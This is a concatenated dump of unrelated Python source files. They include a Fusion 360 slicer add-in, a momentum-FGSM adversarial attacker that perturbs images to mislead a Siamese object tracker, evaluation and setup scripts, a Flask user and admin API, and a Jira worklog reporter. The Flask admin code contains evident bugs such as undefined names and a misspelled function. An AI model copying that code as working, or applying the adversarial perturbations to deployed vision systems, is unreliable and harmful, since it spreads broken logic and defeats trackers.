'X_Slice')
# Make Y Slices
y_component_slices, y_face_slices = create_slices2(target_body, SLICERDEF.y_spacing, input_values['y_qty'],
SLICERDEF.y_plane, input_values['slice_thickness'],
'Y_Slice')
custom_slots = False
if custom_slots:
top_points, bottom_points = make_posts(x_face_slices, y_face_slices)
make_custom_slots(target_body, top_points, input_values['x_template'])
top_points, bottom_points = make_posts(y_face_slices, x_face_slices)
make_custom_slots(target_body, bottom_points, input_values['y_template'])
else:
top_points, bottom_points = make_posts(x_face_slices, y_face_slices)
make_slots(target_body, top_points, input_values['slice_thickness'],
target_body.parentComponent.yConstructionAxis.geometry.direction)
top_points, bottom_points = make_posts(y_face_slices, x_face_slices)
make_slots(target_body, bottom_points, input_values['slice_thickness'],
target_body.parentComponent.xConstructionAxis.geometry.direction)
# Make Components
# SLICERDEF.x_results = components_from_bodies(x_slices)
# SLICERDEF.y_results = components_from_bodies(x_slices)
SLICERDEF.x_component_slices = x_component_slices
SLICERDEF.y_component_slices = y_component_slices
# Todo needs to be a new command. Need to do it with tagging
# End Feature Group
futil.end_group(start_index)
def on_destroy(self, command, inputs, reason, input_values):
if input_values['lay_flat']:
app_objects = get_app_objects()
next_command = app_objects['ui'].commandDefinitions.itemById('cmdID_slicer_lt2')
next_command.execute()
# Run when the user selects your command icon from the Fusion 360 UI
# Typically used to create and display a command dialog box
# The following is a basic sample of a dialog UI
def on_create(self, command, command_inputs):
# Select the bodies
body_select = command_inputs.addSelectionInput('target_input', 'Select Source Body', 'Select Body')
body_select.addSelectionFilter('SolidBodies')
body_select.setSelectionLimits(1, 1)
# Create a default value using a string
default_value = adsk.core.ValueInput.createByString('1.0 in')
default_thk = adsk.core.ValueInput.createByString('.1 in')
# Create a few inputs in the UI
command_inputs.addValueInput('slice_thickness', 'Slice Thickness', 'in', default_thk)
# command_inputs.addValueInput('x_spacing', 'X Spacing Distance', 'in', default_value)
command_inputs.addIntegerSpinnerCommandInput('x_qty', 'X Quantity', 0, 1000, 1, 1)
# body_select = command_inputs.addSelectionInput('x_template', 'Select X Template Body', 'Select Body')
# body_select.addSelectionFilter('SolidBodies')
# body_select.setSelectionLimits(1, 1)
# command_inputs.addValueInput('y_spacing', 'Y Spacing Distance', 'in', default_value)
command_inputs.addIntegerSpinnerCommandInput('y_qty', 'Y Quantity', 0, 1000, 1, 1)
# body_select = command_inputs.addSelectionInput('y_template', 'Select Y Template Body', 'Select Body')
# body_select.addSelectionFilter('SolidBodies')
# body_select.setSelectionLimits(1, 1)
command_inputs.addBoolValueInput('lay_flat', 'Lay Parts Flat?', True, '', False)
# Lite version of Fusion 360 Slicer
class FusionSlicerLTCommand2(Fusion360CommandBase):
def on_execute(self, command, inputs, args, input_values):
global SLICERDEF
# TODO definitely the problem occurs only when there are joints.
# Option may be to move only, no joint.
# Other option may be to delete joints before creating snapshot, althought it doesn't seem to work from API.
# app = adsk.core.Application.get()
# product = app.activeProduct
# design = adsk.fusion.Design.cast(product)
#
# root_comp = design.rootComponent
#
# joints = root_comp.joints
#
# for joint in joints:
# joint.deleteMe()
lay_flat(SLICERDEF.x_component_slices, SLICERDEF.stock_sheet)
lay_flat(SLICERDEF.y_component_slices, SLICERDEF.stock_sheet)
direction_vector = adsk.core.Vector3D.create(1, 0, 0)
arrange_components(SLICERDEF.x_component_slices, SLICERDEF.stock_sheet.end_face, 1.0, direction_vector)
direction_vector = adsk.core.Vector3D.create(0, 1, 0)
arrange_components(SLICERDEF.y_component_slices, SLICERDEF.stock_sheet.end_face, 1.0, direction_vector)
# design.snapshots.add()
| StarcoderdataPython |
1711803 | <reponame>tsingqguo/AttackTracker
# Copyright (c) SenseTime. All Rights Reserved.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import torch
import visdom
from pysot.core.config import cfg
import matplotlib.pyplot as plt
from pysot.models.loss import select_cross_entropy_loss
from toolkit.tvnet_pytorch.model.net.spatial_transformer import spatial_transformer as st
from pysot.attacker.oim_attacker import OIMAttacker
class MIFGSMAttacker(OIMAttacker):
def __init__(self,type,max_num=10,eplison=1,inta=10,lamb=0.0001, norm_type='Momen', apts_num=2,reg_type='L21',accframes=30):
self.type = type
self.eplison = eplison
self.inta = inta
self.norm_type = 'Momen' #norm_type
self.max_num = max_num
self.v_id = 0
#self.st = st()
self.apts_num = apts_num
self.target_traj=[]
self.prev_delta = None
self.tacc = False
self.lamb_momen = 1
self.lamb = 0 # remove the L2,1 regularization
self.reg_type =reg_type
self.acc_iters = 0
self.weight_eplison = 1
self.accframes = accframes
def attack(self,tracker,img,prev_perts=None,weights=None,APTS=False,OPTICAL_FLOW=False,ADAPT=False,Enable_same_prev=True):
"""
args:
tracker, img(np.ndarray): BGR image
return:
adversirial image
"""
w_z = tracker.size[0] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(tracker.size)
h_z = tracker.size[1] + cfg.TRACK.CONTEXT_AMOUNT * np.sum(tracker.size)
s_z = np.sqrt(w_z * h_z)
scale_z = cfg.TRACK.EXEMPLAR_SIZE / s_z
s_x = s_z * (cfg.TRACK.INSTANCE_SIZE / cfg.TRACK.EXEMPLAR_SIZE)
x_crop = tracker.get_subwindow(img, tracker.center_pos,
cfg.TRACK.INSTANCE_SIZE,
round(s_x), tracker.channel_average)
outputs = tracker.model.track(x_crop)
cls = tracker.model.log_softmax(outputs['cls'])
diff_cls = cls[:,:,:,:,1]-cls[:,:,:,:,0]
label_cls = diff_cls.ge(0).float()
if self.type=='UA':
adv_cls,same_prev = self.ua_label(tracker, scale_z, outputs)
adv_cls = adv_cls.long()
elif self.type=='TA':
adv_cls,same_prev = self.ta_label(tracker,scale_z,outputs)
adv_cls = adv_cls.long()
max_iteration = self.max_num
if cfg.CUDA:
pert = torch.zeros(x_crop.size()).cuda()
else:
pert = torch.zeros(x_crop.size())
if prev_perts is None or (same_prev==False and Enable_same_prev==True):
if cfg.CUDA:
prev_perts=torch.zeros(x_crop.size()).cuda()
else:
prev_perts=torch.zeros(x_crop.size())
else:
if APTS==False:
pert_sum = prev_perts.sum(0)
adv_x_crop = x_crop + pert_sum
adv_x_crop = torch.clamp(adv_x_crop, 0, 255)
pert_true = adv_x_crop - x_crop
if cfg.ATTACKER.GEN_ADV_IMG:
adv_img = tracker.get_orgimg(img, x_crop, tracker.center_pos,
cfg.TRACK.INSTANCE_SIZE,
round(s_x), tracker.channel_average)
else:
adv_img = None
return x_crop,pert_true,prev_perts,adv_img
else:
max_iteration = self.apts_num
if self.tacc ==False:
if cfg.CUDA:
prev_perts = torch.zeros(x_crop.size()).cuda()
else:
prev_perts = torch.zeros(x_crop.size())
if cfg.ATTACKER.SHOW:
vis = visdom.Visdom(env='Adversarial Example Showing') #(server='172.28.144.132',port=8022,env='Adversarial Example Showing')
vis.images(x_crop,win='X_org')
vis.images(adv_cls.permute(1,0,2,3), win='adv_cls')
# start attack
losses = []
m=0
if self.norm_type == 'Momen':
if cfg.CUDA:
momen = torch.zeros(x_crop.size()).cuda()
else:
momen = torch.zeros(x_crop.size())
self.acc_iters += max_iteration
while m<max_iteration:
if isinstance(tracker.model.zf, list):
zf = torch.cat(tracker.model.zf, 0)
else:
zf = tracker.model.zf
data = {
'template_zf': zf.detach(),
'search': x_crop.detach(),
'pert':pert.detach(),
'prev_perts':prev_perts.detach(),
'label_cls': label_cls.detach(),
'adv_cls': adv_cls.detach(),
'momen':momen.detach()
}
data['pert'].requires_grad = True
pert,loss,update_cls,momen = self.oim_once(tracker,data)
losses.append(loss)
m+=1
# disp x_crop for each iteration and the pert
if cfg.ATTACKER.SHOW:
x_crop_t = x_crop + prev_perts.sum(0)+pert
x_crop_t = torch.clamp(x_crop_t, 0, 255)
vis.images(x_crop_t,win='X_attack')
vis.images(pert,win='Pert_attack')
plt.plot(losses)
plt.ylabel('Loss')
plt.xlabel('Iteration')
vis.matplot(plt,win='Loss_attack')
# validate the score
outputs = tracker.model.track(x_crop_t)
disp_score = self.log_softmax(outputs['cls'].cpu())
disp_score = disp_score[:, :, :, :, 1].permute(1, 0, 2, 3)
disp_score_min = torch.min(torch.min(disp_score, 2)[0], 2)[0]
disp_score_max = torch.max(torch.max(disp_score, 2)[0], 2)[0]
dispmin = torch.zeros(disp_score.size())
dispmax = torch.zeros(disp_score.size())
for i in range(4):
dispmin[i, :, :, :] = disp_score_min[i].repeat(1, 1, disp_score.shape[2], disp_score.shape[3])
dispmax[i, :, :, :] = disp_score_max[i].repeat(1, 1, disp_score.shape[2], disp_score.shape[3])
disp_score = (disp_score - dispmin) / (dispmax - dispmin) * 255
vis.images(disp_score, win='Response_attack')
self.opt_flow_prev_xcrop = x_crop
if cfg.CUDA:
prev_perts = torch.cat((prev_perts,pert),0).cuda()
else:
prev_perts = torch.cat((prev_perts, pert),0)
pert_sum = prev_perts.sum(0)
adv_x_crop = x_crop + pert_sum
adv_x_crop = torch.clamp(adv_x_crop, 0, 255)
pert_true = adv_x_crop-x_crop
if cfg.ATTACKER.GEN_ADV_IMG:
adv_img = tracker.get_orgimg(img,x_crop,tracker.center_pos,
cfg.TRACK.INSTANCE_SIZE,
round(s_x), tracker.channel_average)
else:
adv_img = None
return adv_x_crop,pert_true,prev_perts,weights,adv_img
def oim_once(self,tracker,data):
if cfg.CUDA:
zf = data['template_zf'].cuda()
search = data['search'].cuda()
pert = data['pert'].cuda()
prev_perts = data['prev_perts'].cuda()
adv_cls = data['adv_cls'].cuda()
momen = data['momen'].cuda()
else:
zf = data['template_zf']
search = data['search']
pert = data['pert']
prev_perts = data['prev_perts']
adv_cls = data['adv_cls']
momen = data['momen']
track_model = tracker.model
zf_list=[]
if zf.shape[0]>1:
for i in range(0,zf.shape[0]):
zf_list.append(zf[i,:,:,:].resize_(1,zf.shape[1],zf.shape[2],zf.shape[3]))
else:
zf_list = zf
# get feature
xf = track_model.backbone(search+pert+prev_perts.sum(0).view(1,prev_perts.shape[1],prev_perts.shape[2],prev_perts.shape[3]))
if cfg.ADJUST.ADJUST:
xf = track_model.neck(xf)
cls, loc = track_model.rpn_head(zf_list, xf)
# get loss1
cls = track_model.log_softmax(cls)
cls_loss = select_cross_entropy_loss(cls, adv_cls)
# regularization loss
t_prev_perts = prev_perts.view(prev_perts.shape[0]*prev_perts.shape[1],prev_perts.shape[2]*prev_perts.shape[3])
reg_loss = torch.norm(t_prev_perts,2,1).sum()+torch.norm(pert,2)
total_loss = cls_loss+self.lamb*reg_loss
total_loss.backward()
x_grad = -data['pert'].grad
adv_x = search
if self.norm_type=='L_inf':
x_grad = torch.sign(x_grad)
adv_x = adv_x+pert+self.eplison*x_grad
pert = adv_x-search
pert = torch.clamp(pert,-self.inta,self.inta)
elif self.norm_type=='L_1':
x_grad = x_grad/torch.norm(x_grad,1)
adv_x = adv_x+pert+self.eplison*x_grad
pert = adv_x-search
pert = torch.clamp(pert/np.linalg.norm(pert,1),-self.inta,self.inta)
elif self.norm_type=='L_2':
x_grad = x_grad/torch.norm(x_grad,2)
adv_x = adv_x+pert+self.eplison*x_grad
pert = adv_x-search
pert = torch.clamp(pert/np.linalg.norm(pert,2),-self.inta,self.inta)
elif self.norm_type=='Momen':
momen = self.lamb_momen*momen+x_grad/torch.norm(x_grad,1)
adv_x = adv_x+pert+self.eplison*torch.sign(momen)
pert = adv_x-search
pert = torch.clamp(pert,-self.inta,self.inta)
p_search = search+pert+prev_perts.sum(0)
p_search = torch.clamp(p_search,0,255)
pert = p_search-search-prev_perts.sum(0)
return pert,total_loss,cls,momen | StarcoderdataPython |
62152 | <filename>run_evaluation.py<gh_stars>10-100
import sys
def append_to_pythonpath(paths):
for path in paths:
sys.path.append(path)
append_to_pythonpath(['/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/clustering',
'/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc',
'/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/detectors/mmdetection',
'/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/trackers/iou_tracker',
'/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/evaluation/py_motmetrics',
'/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/feature_extractors/reid-strong-baseline',
'/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/clustering',
'/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/detectors/mmdetection',
'/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/feature_extractors/ABD_Net'])
import argparse
import mmcv
import logging
from utils.logger import setup_logger
import os
import json
from evaluation.multicam_evaluation import splitted_multi_cam_evaluation
from evaluation.motmetrics_evaluation import splitted_single_cam_evaluation
class Run_clustering:
def __init__(self,args):
self.cfg = mmcv.Config.fromfile(args.config).root
self.cfg.config_basename = os.path.basename(args.config).replace(".py", "")
config_run_path = os.path.join(self.cfg.config_run_path, self.cfg.config_basename)
setattr(self.cfg, "config_run_path", config_run_path)
os.makedirs(config_run_path,exist_ok=True)
self.logger = setup_logger("clustering_logger", self.cfg.config_run_path, 0)
self.logger.info(json.dumps(self.cfg, sort_keys=True, indent=4))
def run(self):
if self.cfg.evaluate_multi_cam:
multi_cam_eval_results_folder = os.path.join(self.cfg.config_run_path,"multi_cam_evaluation")
self.logger.info("Started multi cam evaluation")
splitted_multi_cam_evaluation(dataset_folder=self.cfg.dataset_folder
,
track_results_folder=self.cfg.track_results_folder
, results_output_folder=multi_cam_eval_results_folder
, cam_ids=self.cfg.cam_ids
, working_dir=self.cfg.working_dir
, n_parts=self.cfg.n_parts
)
self.logger.info("Finished multi cam evaluation")
if self.cfg.evaluate_single_cam:
single_cam_eval_results_folder = os.path.join(self.cfg.config_run_path,"single_cam_evaluation")
self.logger.info("Started single cam evaluation")
splitted_single_cam_evaluation(dataset_folder=self.cfg.dataset_folder
,
track_results_folder=self.cfg.track_results_folder
, results_output_folder=single_cam_eval_results_folder
, cam_ids=self.cfg.cam_ids
, working_dir=self.cfg.working_dir
, n_parts=self.cfg.n_parts
)
self.logger.info("Finished single cam evaluation")
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--config", type=str)
return parser.parse_args()
if __name__=="__main__":
args = parse_args()
run_clustering = Run_clustering(args)
run_clustering.run() | StarcoderdataPython |
3395949 | <reponame>Delhpi/gittest<filename>main.py
import sys
print(sys.executable)
#再修改一 下
1547现在错误的
| StarcoderdataPython |
34110 | <reponame>monroid/openvino
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from extensions.ops.sparse_reshape import SparseReshape
from mo.front.common.partial_infer.utils import int64_array
from mo.graph.graph import Node
from unit_tests.utils.graph import build_graph
nodes_attributes = {'input_indices': {'shape': None, 'value': None, 'kind': 'data'},
'input_shape': {'shape': None, 'value': None, 'kind': 'data'},
'new_shape': {'shape': None, 'value': None, 'kind': 'data'},
'sparse_reshape_node': {'op': 'SparseReshape', 'kind': 'op'},
'output_indices': {'shape': None, 'value': None, 'kind': 'data'},
'output_shape': {'shape': None, 'value': None, 'kind': 'data'}}
# graph 1
edges1 = [('input_indices', 'sparse_reshape_node', {'in': 0}),
('input_shape', 'sparse_reshape_node', {'in': 1}),
('new_shape', 'sparse_reshape_node', {'in': 2}),
('sparse_reshape_node', 'output_indices', {'out': 0}),
('sparse_reshape_node', 'output_shape', {'out': 1})]
inputs1 = {'input_indices': {'shape': int64_array([5, 2]), 'value': None},
'input_shape': {'shape': int64_array([2]), 'value': int64_array([4, 5])},
'new_shape': {'shape': int64_array([3]), 'value': int64_array([5, -1, 2])}}
class TestSparseReshape(unittest.TestCase):
def test_partial_infer1(self):
graph = build_graph(nodes_attributes, edges1, inputs1)
sparse_reshape_node = Node(graph, 'sparse_reshape_node')
SparseReshape.infer(sparse_reshape_node)
# prepare reference results
ref_output_indices_shape = np.array([5, 3], dtype=np.int32)
ref_output_shape_value = np.array([5, 2, 2], dtype=np.int32)
# get the result
res_output_indices_shape = graph.node['output_indices']['shape']
res_output_shape_value = graph.node['output_shape']['value']
self.assertTrue(np.array_equal(ref_output_indices_shape, res_output_indices_shape),
'shapes do not match expected: {} and given: {}'.format(ref_output_indices_shape, res_output_indices_shape))
self.assertTrue(np.array_equal(ref_output_shape_value, res_output_shape_value),
'values do not match expected: {} and given: {}'.format(ref_output_shape_value, res_output_shape_value))
| StarcoderdataPython |
57528 | # coding=utf-8
import sys
import petsc4py
petsc4py.init(sys.argv)
from pyvtk import *
import numpy as np
from scipy.io import loadmat
from src import stokes_flow as sf
from src.stokes_flow import problem_dic, obj_dic
from src.geo import *
def main_fun():
matname = 'around'
if matname[-4:] != '.mat':
matname = matname + '.mat'
bnodesHeadle = 'bnodes'
belemsHeadle = 'belems'
fileHandle = 'tryVTK'
bgeo = base_geo()
bgeo.mat_nodes(filename=matname, mat_handle=bnodesHeadle)
bgeo.mat_elmes(filename=matname, mat_handle=belemsHeadle, elemtype='tetra')
bnodes = bgeo.get_nodes()
belems, elemtype = bgeo.get_mesh()
err_msg = 'mesh type is NOT tetrahedron. '
assert elemtype == 'tetra', err_msg
u = bnodes
vtk = VtkData(
UnstructuredGrid(bnodes,
tetra=belems,
),
PointData(Vectors(u, name='velocity')),
' '
)
vtk.tofile(fileHandle)
if __name__ == '__main__':
main_fun()
| StarcoderdataPython |
3223688 | <reponame>falleco/sample-websockets<filename>socketio_django/runserver.py<gh_stars>0
from gevent import monkey
monkey.patch_all()
import os
# from psycogreen.gevent import patch_psycopg
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "socketio_django.settings")
# patch_psycopg()
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
if __name__ == '__main__':
from socketio.server import SocketIOServer
server = SocketIOServer(('', 8000), application, resource="socket.io")
server.serve_forever() | StarcoderdataPython |
3249005 | # Generated by h2py from /usr/include/sys/fcntl.h
O_RDONLY = 0
O_WRONLY = 1
O_RDWR = 2
O_NDELAY = 0x04
O_APPEND = 0x08
O_SYNC = 0x10
O_DSYNC = 0x40
O_RSYNC = 0x8000
O_NONBLOCK = 0x80
O_PRIV = 0x1000
O_CREAT = 0x100
O_TRUNC = 0x200
O_EXCL = 0x400
O_NOCTTY = 0x800
F_DUPFD = 0
F_GETFD = 1
F_SETFD = 2
F_GETFL = 3
F_SETFL = 4
F_SETLK = 6
F_SETLKW = 7
F_O_GETLK = 5
F_SETLK = 6
F_SETLKW = 7
F_CHKFL = 8
F_ALLOCSP = 10
F_FREESP = 11
F_ISSTREAM = 13
F_GETLK = 14
F_PRIV = 15
F_NPRIV = 16
F_QUOTACTL = 17
F_BLOCKS = 18
F_BLKSIZE = 19
F_RSETLK = 20
F_RGETLK = 21
F_RSETLKW = 22
F_GETOWN = 23
F_SETOWN = 24
F_REVOKE = 25
F_RDLCK = 01
F_WRLCK = 02
F_UNLCK = 03
F_UNLKSYS = 04
O_ACCMODE = 3
FD_CLOEXEC = 1
| StarcoderdataPython |
3287041 | <reponame>seanmanson/euler
import math
daysInMonthLeap = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
daysInMonth = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
def isLeapYear(year):
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
curYear = 1901
curMonth = 1
curDay = 1
curWeekday = 2 #tuesday
numSundaysOnFirst = 0
while curYear < 2001:
if curDay == 1 and curMonth == 1:
print(curYear, curWeekday)
if curWeekday == 0 and curDay == 1:
numSundaysOnFirst+=1
#iterate
curWeekday+=1
if curWeekday >= 7:
curWeekday = 0
curDay+=1
if isLeapYear(curYear):
if curDay > daysInMonthLeap[curMonth-1]:
curDay = 1
curMonth+=1
else:
if curDay > daysInMonth[curMonth-1]:
curDay = 1
curMonth+=1
if curMonth > 12:
curMonth = 1
curYear+=1
print (numSundaysOnFirst)
| StarcoderdataPython |
3247332 | import os
from setuptools import setup
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='tech-inventory-update',
version='0.1',
author="<NAME>",
author_email="<EMAIL>",
install_requires=[
'requests',
'gspread',
'PyYAML',
'toml',
],
license='Apache License, Version 2.0',
description=('AXDD Technology spreadsheet updater'),
url='https://github.com/uw-it-aca/tech-inventory-update',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
],
)
| StarcoderdataPython |
192924 | <filename>farmbeats-server/soilmoisture.py
from grove import adc
class SoilMoistureSensor:
def __init__(self, pin:int):
self.__pin = pin
self.__adc = adc.ADC()
self.__moisture = -1
def capture_values(self) -> None:
self.__moisture = self.__adc.read(self.__pin)
@property
def moisture(self) -> int:
return self.__moisture | StarcoderdataPython |
1644995 | from collections import defaultdict, namedtuple, Counter, deque
import csv
import collections
Player = collections.namedtuple('Stats', 'player, team, position, height, weight, age, pc')
baseball_csv = './baseball.csv'
fifa_csv = './fifa.csv'
def get_baseball_stats(path=baseball_csv):
with open(path, encoding='utf-8') as f:
reader = csv.DictReader(f)
player_dict = collections.defaultdict(list)
for line in reader:
try:
player = line['Name']
team = line['Team']
position = line['Position']
height = line['Height']
weight = line['Weight']
age = line['Age']
pc = line['PosCategory']
except ValueError:
continue
p = Player(player=player, team=team, position=position, height=height, weight=weight, age=age, pc=pc)
player_dict[player].append(p)
return player_dict
# print(get_baseball_stats(baseball_csv))
get_player_stat = get_baseball_stats()
ryan = (get_player_stat['Ryan_Sweeney'])
ryan = ryan[0]
print(ryan.height)
cnt = Counter()
for player, item in get_player_stat.items():
# cnt[director] += len(movies)
print(player.replace('_', ' '))
item = item[0]
print(item.height)
| StarcoderdataPython |
105819 | <filename>setup.py
#!/usr/bin/env python
import setuptools
__author__ = "<NAME>"
with open("README.md", "r") as f:
README = f.read()
setuptools.setup(
name="sea_nwautomation_meetup_oct_2019",
version="2019.09.15",
author=__author__,
author_email="<EMAIL>",
description="Check out some cool nornir stuff!",
long_description=README,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(),
install_requires=[],
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Operating System :: POSIX :: Linux",
"Operating System :: MacOS",
],
python_requires=">=3.6",
)
| StarcoderdataPython |
1699961 | <gh_stars>0
from flask import request
from flask_restful import Resource
from flask_jwt_extended import jwt_required, create_access_token, get_jwt_identity, get_raw_jwt
from app.utils import str2uuid
from app.api.user.models import User, CoffeeHistory
from app.api.system.models import SystemSetting
from app.security import TokenBlacklist
from app.api.tasks import create_invoice
class UserRegisterApi(Resource):
def post(self):
data = request.get_json()
if User.find_by_username(data.get('username')):
return {
"msg": "Dieser Username ist leider bereits vergeben."
}, 500
user = User(**data)
try:
user.save()
return {
"msg": "Der User wurde erfolgreich angelegt."
}, 201
except:
return {
"msg": "Der User konnte nicht angelegt werde. Ein Fehler ist passiert."
}, 500
class UserLoginApi(Resource):
def post(self):
data = request.get_json()
user = User.find_by_username(data.get('username'))
if user and user.check_password(data.get('password'), user._password):
access_token = create_access_token(identity=str(user.id), fresh=True)
return {
"access_token": access_token,
"username": user.username
}, 200
return {
"msg": "Invalid credentials"
}, 401
class UserLogoutApi(Resource):
@jwt_required
def post(self):
jti = get_raw_jwt()['jti']
token = TokenBlacklist(jti=jti)
try:
token.save()
return {
"msg": "Sie wurden erfolgreich ausgeloggt."
}, 200
except:
return {
"msg": "Es ist ein Fehler beim Ausloggen auftreten."
}, 500
class UserApi(Resource):
@jwt_required
def get(self):
user = User.find_by_id(get_jwt_identity())
history = user.coffee_hist
if not user:
return {
"msg": "User nicht gefunden."
}, 404
return {
"user": user.json(),
"history": [ hist.json() for hist in history ]
}, 201
@jwt_required
def put(self):
user = User.find_by_id(get_jwt_identity())
data = request.get_json()
if not user:
return {
"msg": "Kein User gefunden!"
}, 404
else:
for key, value in user.items():
user[key] = data[key]
try:
user.save()
return {
"msg": "Daten wurden gespeichert."
}, 201
except:
return {
"msg": "Etwas ist beim Speicher der User-Daten falsch gelaufen."
}, 500
class AdminAllUserApi(Resource):
@jwt_required
def get(self):
admin = User.find_by_id(get_jwt_identity())
if not user.is_admin:
return {
"msg": "Sie haben nicht die notwendigen Rechte."
}, 500
users = User.get_all()
return {
"users": [ user.json() for user in users ]
}
class AdminUserApi(Resource):
@jwt_required
def put(self):
admin = User.find_by_id(get_jwt_identity())
data = request.get_json()
user = User.find_by_id(data[user_id])
if not admin.is_admin:
return {
"msg": "Sie haben nicht die notwendigen Rechte."
}, 500
if not user:
return {
"msg": "User konnte nicht gefunden werden."
}, 404
else:
for key, value in user.items():
user[key] = data[key]
try:
user.save()
return {
"msg": "User {username}/{vorname} wurde geupdatet.".format(username=user.username, vorname=user.vorname)
}
except:
return {
"msg": "Ein Fehler ist beim Speichern aufgetreten."
}, 500
class AdminSysSettingApi(Resource):
@jwt_required
def get(self):
sysSetting = SystemSetting.query.filter().first()
user = User.find_by_id(get_jwt_identity())
if not user.is_admin:
return {
"msg": "Sie haben nicht die notwendigen Rechte."
}, 500
if not sysSetting:
return {
"msg": "Keine System Einstellungen eingerichtet."
}, 404
return {
"systemSetting": sysSetting.json()
}, 200
@jwt_required
def post(self):
user = User.find_by_id(get_jwt_identit())
if not user.is_admin:
return {
"msg": "Sie haben nicht die notwendigen Rechte."
}, 500
data = request.get_json()
sysSetting = SystemSetting(**data)
try:
sysSetting.save()
return {
"msg": "System Einstellungen erfolgreich gespeichert."
}, 201
except:
return {
"msg": "Beim Speichern ist etwas schief gelaufen."
}, 500
@jwt_required
def put(self):
user = User.find_by_id(get_jwt_identit())
if not user.is_admin:
return {
"msg": "Sie haben nicht die notwendigen Rechte."
}, 500
data = request.get_json()
sysSetting = SystemSetting.query.filter().first()
for key, value in sysSetting.items():
sysSetting[key] = data[key]
try:
sysSetting.save()
return {
"msg": "System Einstellungen erfolgreich gespeichert."
}
except:
return {
"msg": "Beim Speichern ist etwas schief gelaufen."
}, 500
class AdminInvoiceApi(Resource):
@jwt_required
def post(self):
user = User.find_by_id(get_jwt_identit())
if not user.is_admin:
return {
"msg": "Sie haben nicht die nötigen Rechte dies zu tun."
}
data = request.get_json()
user_list = data['user_list']
timeDelta = data['timeDelta']
for each in user_list:
create_invoice.delay(each['id'], timeDelta)
return {
"msg": "Emails werden gesendet."
}, 201
| StarcoderdataPython |
136118 | <gh_stars>1-10
import receive
import send
def main():
while True:
def choice():
ans = input("\tC: Create network\n\tJ: Join network\n\tE:Exit\nPlease enter your choice (C/J/E):")
if ans == "C" or ans == "c":
send.create_network()
elif ans == "J" or ans == "j":
receive.join_network()
elif ans == "E" or ans == "e":
exit()
else:
print("You must only select either S or R")
print("please try again")
choice()
if __name__ == "__main__":
main()
| StarcoderdataPython |
1755864 | from jira import JIRA
import csv
import codecs
import datetime
options = {'server': '*'}
jira = JIRA(options, basic_auth=("*", "*"))
projects = jira.projects() # list containing all projects
# loop to print all of the projects
for i in projects:
print(i)
print("")
# Clears the CSV file before writing reports to it
with open('test3.csv', mode='w') as file:
pass
all_worker_names = [] # holds the names of all workers
csv_header = [] # header of the csv file
print('loading worker names...')
# Used to append all of workers that existed in any project into both the csv_header and all_worker_names
for project in projects:
print(project)
all_issues = jira.search_issues('project="{}"'.format(project)) #list which contains all issues in a project
# obtains worker names from each issue in each project
for i in range(len(all_issues)):
issue = jira.issue(all_issues[i])
worklogs = jira.worklogs(issue.key) #list of all of the worklegs in an issue
for worklog in worklogs:
author = worklog.author #gets the name of the worklog authors
if str(author) not in all_worker_names: # avoiding repeated names from being added to the lists
all_worker_names.append(str(author))
csv_header.append(str(author))
print('worker names have been fully loaded')
print("")
projectcount = 0 # used to indicate the number of projects that have been loaded into the file, this is so the header only gets written once
print('writing reports to csv file...')
# loops through each project to get reports
for projectname in projects:
print(projectname)
all_issues = jira.search_issues('project="{}"'.format(projectname)) #list which contains all issues in a project
issue_list = [] #contains the summary of the issues, the names of workloggers and the time they logged
worker_name_list = [] #contains the names of the workers that have worked on the project
WorkerAndTS = [] #will become a 2D list which contains the names of the workers and the times they've worked on each issue
fullissuelist = [] #this list will contain the summaries of each issue as well as the total amount of hours worked on an issue by each person in the worker_name_list
#this loop is used to bring down the issue names and the worklogs on each issue
for i in range(len(all_issues)):
issue = jira.issue(all_issues[i])
issue_list.append([issue.fields.summary]) #issue.fields.summary represents the summary of the issue each issue will be put in a 2D list so I can apppend time values to it as well
fullissuelist.append([issue.fields.summary])
worklogs = jira.worklogs(issue.key) #list of all of the worklegs in an issue
for worklog in worklogs:
author = worklog.author #gets the name of the worklog authors
time = worklog.timeSpentSeconds #gets the amount of time that has been logged by the authors
issue_list[i].append(str(author)) #through each iteration, the issue_list will fill up with worklogs and issue names
issue_list[i].append(str(time))
#the issue_list at this point will contain names of all issue authors, this include repeated names of the same author. this if statement serves as a function
#to remove duplicate names from the issue_list by appending them to a new list (worker_name_list)
if str(author) not in worker_name_list:
worker_name_list.append(str(author))
#this function baically splits each item in the worker_name_list, so each worker gets their own nested list, this will be used in order to tie the time spent to the worker who spent it
for i in range(len(worker_name_list)):
WorkerAndTS.append([worker_name_list[i]])
#Looping through all of the issues again in order to add time values to the rearrangedlist
for i in range(len(all_issues)):
for j in range(len(WorkerAndTS)): #adds the number 0 to each list in WorkerAndTS for each issue in a project.
WorkerAndTS[j].append(0) #These 0s represent the amount of hours worked on each project by the worker, based on their worklog
issue = jira.issue(all_issues[i])
worklogs = jira.worklogs(issue.key)
for worklog in worklogs:
author = worklog.author
time = worklog.timeSpentSeconds
